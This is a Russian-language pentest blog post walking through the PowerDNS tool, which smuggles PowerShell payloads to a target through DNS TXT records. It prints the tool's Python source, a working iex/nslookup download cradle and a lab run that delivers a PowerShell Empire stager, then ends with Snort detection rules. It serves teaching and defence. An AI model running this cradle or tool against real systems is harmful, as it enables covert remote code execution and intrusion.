Доставка Powershell скриптов через DNS туннель и методы противодействия

в 10:37, , рубрики: dns tunnel, powerdns, Powershell Empire, Блог компании PentestIT, информационная безопасность

Доставка Powershell скриптов через DNS туннель и методы противодействия - 1

В данной статье мы поговорим о новом инструменте, позволяющем передавать Powershell скрипты на целевую машину внутри DNS пакетов с целью сокрытия трафика. Разберем, как работает PowerDNS и как защититься от подобных атак.

Разбор кода

Инструмент можно скачать на официальном GitHub.
После клонирования репозитория внутри вы найдете файл powerdns.py. Из этого скрипта, написанного на python, по сути, и состоит весь инструмент. Давайте разберем, что он делает.

Изучим раздел import

import scapy, sys
from scapy.all import *
import base64
import signal
import argparse

Сразу обращаем внимание на то, что PowerDSN использует scapy для работы с сетевыми пакетами.

Далее нам требуется задать интерфейс для прослушивания. Обратите внимание, что эту опцию нельзя задать через параметры командной строки.

INTERFACE = 'eth0'
chunks = []
domain = ''

Далее идут описания функций проверки корректности запуска — validate_args(), показ баннера из файла banner.txt — show_banner(), их мы разбирать не будем.

Следующая функция более интересна — base64_file(file).

def base64_file(file):
    try:
        with open(file, "rb") as powershell_file:
            encoded_string = base64.b64encode(powershell_file.read())
        return encoded_string
    except:
        print("33[1;34m[*] PowerDNS:33[0;0m Error opening file")
        sys.exit(-1)

Она открывает файл, который мы передаем в параметрах при запуске и кодирует его содержимое в Base64.

Далее описывается функция get_chunks(file)

def get_chunks(file):
    tmp_chunks = []
    encoded_file = base64_file(file)
    for i in range(0,len(encoded_file), 250):
        tmp_chunks.append(encoded_file[i:i+250])
    return tmp_chunks

Которая разбивает Base64 пейлоад, полученный с помощью функции base64_file на части по 250 символов.

Далее идет основная функция, выполняющая корректную отправку пейлоада внутри DNS пакетов — powerdnsHandler(data)

def powerdnsHandler(data):
    if data.haslayer(DNS) and data.haslayer(DNSQR):
        global chunks
        ip = data.getlayer(IP)
        udp = data.getlayer(UDP)
        dns = data.getlayer(DNS)
        dnsqr = data.getlayer(DNSQR)

        print('33[1;34m[*] PowerDNS:33[0;0m Received DNS Query for %s from %s' % (dnsqr.qname, ip.src))

Если скрипт получает DNS пакет, то в консоли отображается строка вида «Received DNS Query for...»

          if len(dnsqr.qname) !=0 and dnsqr.qtype == 16:
            try:
                response = chunks[int(dnsqr.qname.split('.')[0])]
            except:
                return
            rdata=response
            rcode=0
            dn = domain
            an = (None, DNSRR(rrname=dnsqr.qname, type='TXT', rdata=rdata, ttl=1))[rcode == 0]
            ns = DNSRR(rrname=dnsqr.qname, type="NS", ttl=1, rdata="ns1."+dn)
            forged = IP(id=ip.id, src=ip.dst, dst=ip.src) /UDP(sport=udp.dport, dport=udp.sport) /  DNS(id=dns.id, qr=1, rd=1, ra=1, rcode=rcode, qd=dnsqr, an=an, ns=ns)
            send(forged, verbose=0, iface=INTERFACE)

Если тип запрашиваемой записи TXT (см. Типы ресурсных записей DNS) то отправляется часть пейлоада (chunks[int(dnsqr.qname.split('.')[0])]) внутри DNS пакета, причем та часть, номер которой был в запросе dnsqr.qname.

Далее идет основное тело программы

try:
    show_banner()
    args = validate_args()
    signal.signal(signal.SIGINT, signal_handler)
    chunks = get_chunks(args.file)
    domain = args.domain

Здесь проверяется корректность запуска и читаются значения параметров.

Затем мы видим интересную строку с переменной STAGER_CMD

STAGER_CMD = "for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.%s')[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))" % (str(len(chunks)), domain)

Это загрузчик powershell скрипта, который мы передали в параметрах запуска. Именно этот скрипт будет передан целевой машине первым. При выполнении этого скрипта, PowerShell будет циклически выполнять команды вида

nslookup -q=txt -timeout=3 0.domain.com
nslookup -q=txt -timeout=3 1.domain.com
nslookup -q=txt -timeout=3 2.domain.com
...

И таким образом получать пейлоад по частям, которые хранятся в переменной chunks.

Далее пользователю отображается, на сколько частей был разбит выбранный powershell скрипт. После этого на нулевой индекс в список вставляется Download Cradle скрипт STAGER_CMD.

    print("33[1;34m[*] PowerDNS:33[0;0m Splitting %s in to %s chunk(s)" % (args.file, str(len(chunks))))
    chunks.insert(0,STAGER_CMD)

Чтобы посмотреть на какие части был разбит наш скрипт, можно вставить после chunks.insert

for j in chunks:
        print chunks.index(j)
        print j

Пользователю будет отображена команда, которую нужно выполнить на целевой машине

    print("33[1;34m[*] PowerDNS:33[0;0m Use the following download cradle:n33[1;34m[*] PowerDNS:33[0;0m powershell "powershell (nslookup -q=txt -timeout=5 0.%s)[-1]"" % (domain))

Это команда вида

powershell "powershell (nslookup -q=txt -timeout=5 0.domain.com)[-1]"

Т.е. Powershell получит Download Cradle код через запрос TXT записи к 0.domain.com (STAGER_CMD хранится под нулевым индексом), выполнит его и запустит цикл получения основного скрипта в Base64. Мы используем [-1] так как нам нужно передать в PowerShell интерпретатор именно Download Cradle, а не имя DNS сервера и т.п. В вашем случае, возможно, придется использовать другую строку, чтобы передать в PowerShell правильную часть ответа от nslookup.

И последние строки кода запускают прослушивание DNS запросов на выбранном интерфейсе. При получении запроса, вызывается функция powerdnsHandler

while True:
		mSniff = sniff(filter="udp dst port 53", iface=INTERFACE, prn=powerdnsHandler)
except Exception as e:
    sys.exit(-1)

Если у Вас что-то не работает, я бы дополнил код, строкой print(e) перед sys.exit, чтобы видеть ошибки выполнения.

Практический пример

В качестве полезной нагрузки, т.е. основного powershell скрипта, я буду использловать Powershell Empire стейджер.

Создаю листнер

Доставка Powershell скриптов через DNS туннель и методы противодействия - 2

Генерирую код стейджера и помещаю его в файл payload.ps1

Доставка Powershell скриптов через DNS туннель и методы противодействия - 3

Я должен запустить powerdns.py на авторитативном DNS сервере, зону которого контролирую.
В моей тестовой инфраструктуре я использую домен sub.secret.lab. Запускаем на этой машине PowerDNS

python powerdns.py --file payload.ps1 --domain sub.secret.lab

Теперь я должен выполнить Download Cradle на удаленной машине

Доставка Powershell скриптов через DNS туннель и методы противодействия - 4

После выполнения powershell команды я начинаю видеть следующие записи в консоли PowerDNS

[*] PowerDNS: Use the following download cradle:
[*] PowerDNS: powershell "powershell (nslookup -q=txt -timeout=5 0.sub.secret.lab)[-1]"
[*] PowerDNS: Received DNS Query for 3.1.168.192.in-addr.arpa. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 0.sub.secret.lab. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 3.1.168.192.in-addr.arpa. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 1.sub.secret.lab. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 3.1.168.192.in-addr.arpa. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 2.sub.secret.lab. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 3.1.168.192.in-addr.arpa. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 3.sub.secret.lab. from 192.168.1.10
[*] PowerDNS: Received DNS Query for 3.1.168.192.in-addr.arpa. from 192.168.1.10
...

Если запустить сниффер wireshark и изучить DNS пакеты, то мы увидим следующее

Доставка Powershell скриптов через DNS туннель и методы противодействия - 5

Запрос

Доставка Powershell скриптов через DNS туннель и методы противодействия - 6

И ответ (Download Cradle, который возвращается при запросе к 0.sub.secret.lab)

Доставка Powershell скриптов через DNS туннель и методы противодействия - 7

После получения последней части скрипта, видим сообщение в PowerShell Empire об успешном подключении агента

Доставка Powershell скриптов через DNS туннель и методы противодействия - 8

И, как видим, он рабочий

Доставка Powershell скриптов через DNS туннель и методы противодействия - 9

Защита

Для блокирования конкретно этого скрипта можно искать в DNS запросах сигнатуру Download Cradle-а, т.е. что-то похожее на

for ($i=1;$i -le 19;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.sub.secret.lab'

Правило для сетевой IPS Snort 2.X может выглядеть примерно так

drop udp any 53 <> any any (content: "| 7b 24 62 36 34 2b 3d 69 65 78 28 |"; msg:"PowerDNS Detected!"; sid:10000002; rev:001;)

Результат

Доставка Powershell скриптов через DNS туннель и методы противодействия - 10

Доставка Powershell скриптов через DNS туннель и методы противодействия - 11

Доставка Powershell скриптов через DNS туннель и методы противодействия - 12

Однако Download Cradle может быть более сложным и быть подвергнут обфускации, например при помощи Invoke-CradleCrafter. Тогда такое правило не сработает.

В этом случае можно обращать внимание на превышение порогового числа DNS запросов типа TXT, используя подобное правило

alert udp any any -> any 53 (msg:"High TXT requests - Potential DNS Tunneling"; content:"|00 00 10 00 01|"; offset:12; threshold: type threshold, track by_src, count 3, seconds 30; sid: 1000003; rev: 001;)

Результат

Доставка Powershell скриптов через DNS туннель и методы противодействия - 13

Нужно иметь в виду, что DNS туннели могут использовать не только тип записи TXT, поэтому данные примеры демонстрируют защиту конкретно от инструмента PowerDNS. Инструментов для создания DNS туннелей достаточно много, поэтому для эффективной защиты рекомендуется убедиться, что ваши правила защищают инфраструктуру от всех типов туннелей.

Автор: antgorka

Источник

* - обязательные к заполнению поля


https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js